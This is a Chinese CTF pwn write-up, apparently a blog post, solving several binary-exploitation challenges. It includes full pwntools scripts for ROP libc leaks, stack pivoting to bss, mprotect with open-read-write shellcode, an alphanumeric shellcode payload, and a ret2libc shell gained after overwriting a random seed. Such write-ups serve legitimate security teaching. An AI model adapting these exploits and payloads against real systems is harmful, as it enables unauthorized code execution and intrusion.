EzSignIn
签到题,直接nc得到flag
Elden Ring Ⅰ
下载题目附件发现给了一个libc库,一张图片,还有一个文件
其实这个图片没什么用,一开始看到有图片还以为这题要结合misc
看到libc库基本就确定这题要用到libc了
将文件保存到虚拟机里checksec查看保护
开启NX,64位,动态编译,IDA分析:
看到seccomp函数,得知本题存在沙盒保护
进入vuln函数查看:
简简单单一个读入函数,可以栈溢出,但溢出字节不多
既然有沙盒,那肯定考虑使用orw的做法,这边我就不再复述思路了,不知道orw思路的朋友可以去看看我的另一篇专门写沙盒的博文:https://blog.csdn.net/2301_79880752/article/details/136016919?spm=1001.2014.3001.5502
实操:
首先我们需要泄露基址,由于本题可以栈溢出,因此我们可以直接泄露基址:
随后栈迁移修改地址到bss段
调用mprotect函数,并使用orw获取flag
这边有一点需要注意:
前面提到过,可以栈溢出,但溢出的字节不多,因此脚本编写到这里需要再一次栈迁移
不了解的朋友可以去看看另一个跟我一起学习的朋友的博文,它对基础栈迁移写的较详细:
https://blog.csdn.net/2302_79813730/article/details/136005454?spm=1001.2014.3001.5502
脚本如下:
from pwn import *
context(log_level='debug',os='linux',arch='amd64')
p=remote("47.102.130.35",31975)
#libc=ELF("/lib/x86_64-linux-gnu/libc.so.6")
libc=ELF("./libc.so.6")
#p=process("./vuln")
elf=ELF("./vuln")
#def bug():
# gdb.attach(p)
# pause()
rdi=0x00000000004013e3
p.recvuntil("Greetings. Traveller from beyond the fog. I Am Melina. I offer you an accord.\n")
pay=b'a'*0x108+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(0x40125B)
p.send(pay)
#leek libc_base================================================
puts_addr=u64(p.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
print(hex(puts_addr))
libc_base=puts_addr-libc.sym['puts']
print(hex(libc_base))
system=libc_base+libc.sym['system']
bin_sh=libc_base+libc.search(b"/bin/sh\x00").__next__()
#==============================================================
bss=0x404060+0x500
p.recvuntil("Greetings. Traveller from beyond the fog. I Am Melina. I offer you an accord.\n")
pay=b'a'*0x100+p64(bss+0x100)+p64(0x401276)
p.send(pay)
rsi=libc_base+0x000000000002601f#0x000000000002be51
rdx_r12=libc_base+0x0000000000119211#0x000000000011f497
mprotect=libc_base+libc.sym['mprotect']
pay = (p64(rdi)+p64(0x404000)+p64(rsi)+p64(0x1000)+p64(rdx_r12)+p64(7)*2+p64(mprotect)+p64(0x4045a8)+asm(shellcraft.open("/flag"))+asm(shellcraft.read(3,bss+0x700,0x100))+asm(shellcraft.write(1,bss+0x700,0x100))).ljust(0x100,b'\x00')+p64(bss-8)+p64(0x0000000000401290)
#bug()
p.send(pay)
p.interactive()
ezshellcode
保护全开,64位,动态编译,IDA分析:
这个题就是一个可显字符的shellcode
先输入-1
然后发送:b"Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t"
就可以绕过了
这边注意不能用sendline发送
脚本如下:
from pwn import*
context(os='linux', arch='amd64', log_level='debug')
p=process('./shellcode')
#p=remote('47.102.130.35',31408)
p.recvuntil(b'input the length of your shellcode:')
p.sendline(str(-1))
shellcode=b'Ph0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0P160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8P115l1n0J0h0a070t'
p.recvuntil(b'input your shellcode:')
p.send(shellcode)
p.interactive()
Elden Random Challenge
开启NX,64位,动态编译,IDA分析:
读入十二个字节到buf里,和v6是贴着的,而buf读入十二个字节是可以覆盖seed的,而seed是程序生产随机值的依据,覆盖掉seed以后它的随机值就可控了,写个c语言脚本控制生成的随机值
再跟进myread函数
存在栈溢出,由于本题附件给了libc库,因此直接通过libc获取权限得到flag
脚本如下:
from pwn import *
import ctypes
context(os='linux',arch='amd64',log_level='debug')
#p=process("./vuln")
p=remote('47.100.245.185',30511)
libc=ELF("./libc.so.6")
elf=ELF("./vuln")
def bug():
gdb.attach(p)
pause()
rdi=0x0000000000401423
read=0x40125D
a=[84,87,78,16,94,36,87,93,50,22,63,28,91,60,64,27,41,27,73,37,12,69,68,30,83,31,63,24,68,36,30,3,23,59,70,68,94,57,12,43,30,74,22,20,85,38,99,25,16,71,14,27,92,81,57,74,63,71,97,82,6,26,85,28,37,6,47,30,14,58,25,96,83,46,15,68,35,65,44,51,88,9,77,79,89,85,4,52,55,100,33,61,77,69,40,13,27,87,95]
p.recvuntil("Menlina: Well tarnished, tell me thy name.")
pay=b'\x00'*(0x12)
p.send(pay)
#bug()
for i in range(len(a)):
p.recvuntil("Please guess the number:\n")
p.send(p32(a[i]))
p.recvuntil("Here's a reward to thy brilliant mind.")
payload1=b'a'*(0x30+8)+p64(rdi)+p64(elf.got['puts'])+p64(elf.plt['puts'])+p64(read)
p.sendline(payload1)
libc_base =u64(p.recvuntil('\x7f')[-6:].ljust(8,b'\x00'))-libc.sym['puts']
print(hex(libc_base))
system=libc_base+libc.sym['system']
bin_sh=libc_base+libc.search(b"/bin/sh\x00").__next__()
payload2=b'a'*(0x30+8)+p64(rdi)+p64(bin_sh)+p64(rdi+1)+p64(system)
p.sendline(payload2)
p.interactive()